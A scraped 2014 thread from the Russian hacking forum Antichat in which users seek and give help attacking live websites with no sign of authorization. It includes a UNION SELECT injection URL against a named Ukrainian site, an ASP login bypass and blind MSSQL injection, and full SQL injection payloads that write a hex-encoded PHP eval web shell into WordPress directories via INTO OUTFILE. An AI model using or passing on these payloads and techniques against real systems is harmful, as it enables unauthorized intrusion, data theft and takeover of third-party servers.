ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.05.2014, 16:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 132418
Репутация:
652
|
|
Сообщение от LelouchMe
LelouchMe said:
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...
title смотрите.
|
|
|
|

06.05.2014, 16:11
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме: 70640
Репутация:
0
|
|
Сообщение от LelouchMe
LelouchMe said:
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,version(),6--
Все выводит.
|
|
|

08.05.2014, 18:48
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме: 189651
Репутация:
-5
|
|
Добрый день! Подскажите пожалуйста, по заливке шелла
Заливаю файл через phpmyadmin под пользователем root. File_priv=Y Grant_priv=Y
Знаю полный путь до сайта через phpinfo, и знаю точные папки доступные под запись.
В /tmp заливается без проблем файл и считывается тоже.
Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
|
|
|

08.05.2014, 19:12
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.
Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
|
|
|

08.05.2014, 19:40
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме: 189651
Репутация:
-5
|
|
Сообщение от XAMEHA
XAMEHA said:
Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.
Да действительно, сейчас залился через админку netcat. Права на сайт полные, но юзер какраз другой. Видимо из-за этого и не заливалось((
|
|
|

09.05.2014, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 20084
Репутация:
0
|
|
Задача: нужно сдампить 3 колонки с помощью sqlmap
column1 - int
column2,3 - varchar
Но почему то дампится только одна колонка
По отдельности, все нормально. В чем может быть причина?
Синтаксически запрос составляю верно
|
|
|
|

12.05.2014, 19:07
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме: 1180165
Репутация:
11
|
|
Привет, прошу помощи:
Есть asp сайт, при помощи ' or 1=1-- в поле пассворд можно залогинится под юзером, я так полагаю под 1 юзером в бд, но это не админ.
Как-то можно раскрутить это?
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]Microsoft VBScript runtime error[/COLOR][COLOR="#DD0000"]'800a000d'[/COLOR][COLOR="#0000BB"]Type mismatch[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]'Cint'[/COLOR][/COLOR]
вот еще, помогите пожалуйста, а то не знал, не знал да и забыл все в скулях
UPDATE
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]Microsoft OLE DB Provider[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]SQL Server error[/COLOR][COLOR="#DD0000"]'80040e14'[/COLOR][COLOR="#0000BB"]Unclosed quotation mark after the character string[/COLOR][COLOR="#DD0000"]'8''.[/COLOR][/COLOR]
при .asp?itemkey=12345678' проблема в том что стоит фильтир, если неравно 9 символом, то выскакивает еррор пейдж, есть ли возможность обойти?///
UPD
есть blind MSsql inj, подкиньте маны, а то гугл не помогает
//
karoche mana est'
теперь нужен софт для раскрутки blind MSSQL injection, или кто гуру - какие параметры кормить sqlmap?
иньекция в поле пассворд, логика
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]or {[/COLOR][COLOR="#0000BB"]MY STATEMENT HERE[/COLOR][COLOR="#007700"]}[/COLOR][/COLOR]
как-то так
ПС
походу надо писать софт, ибо если руками перебирать то можно в психушку попасть
АПДЕЙТ
Я еще не в психушке, хорошый мануал по ms sql _ttp://www.exploit-db.com/papers/12975/
|
|
|

18.05.2014, 15:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 182660
Репутация:
324
|
|
Может ли быть xss в ответе аякса если не фильтруются ?
пробовал добавлять html / body head и т.п.
ничего не выходило
|
|
|
|

19.05.2014, 09:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 114076
Репутация:
54
|
|
Сообщение от psihoz26
psihoz26 said:
Может ли быть xss в ответе аякса если не фильтруются ?
пробовал добавлять html / body head и т.п.
ничего не выходило
Вероятно, сервер отдает Content-Type: text/*
Поведение разных версий браузеров может варьироваться.
|
|
|
|

19.05.2014, 21:52
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме: 5422
Репутация:
0
|
|
Условия:
1. File_priv: Y
2. Возможно читать файлы
3. Возможное раскрытие путей через Wordpress
4. Заливка файла через INTO OUTFILE - возможна.
Всё-бы нечего, НО:
Начнём историю по порядку - во-первых на самом сайте через wp-config запрещён доступ к theme-editor и plugin-editor всем пользователям.
Но я не отчаивался, т.к. File_priv: Y.
Всё вроде бы ничего и даже получил раскрытие путей, однако:
Сообщение от None
/home/httpd/html/site/shared/wp/live/
Уже это насторожило, т.к. сам блог находится по адресу site.com/blog/, но я не сдавался и шел по избранному мною пути:
1.
Сообщение от None
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php'--
Can't create/write to file '/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php' (Errcode: 2)
Супервозмущение
Но я не отчаивался и шёл!
Дошёл до
2.
Сообщение от None
+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/'--
File '/home/httpd/html/' already exists
И вот, я кажется дошёл. Но тут подвох - я перепробовал все возможные комбинации и даже очень опасную, однако даже она дала сбой
Can't create/write to file '/home/httpd/html/huipizdamatreshka/' (Errcode: 21)
Если подставлять вместо опасного запроса, запрос вида: into+outfile+'/home/httpd/html/site/1.txt'-- , либо любой другой, то получаю ошибку Errcode: 2 , т.е. нет директории site.
Читал на форумах, что в случае, если адрес не известен, то читаем файл httpd.conf (прочитал его по /etc/httpd/conf/httpd.conf ).
Нашёл в нём: DocumentRoot "/var/www/html" и всё равно провалился. Чтобы не делал - результат один Errcode 2, 13, 21
Есть ли у кого-нибудь, какие-нибудь предположение или догадки, как найти полный путь до папки? Кстати, нет-нет, но закачал файл в /tmp/ . Результат
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|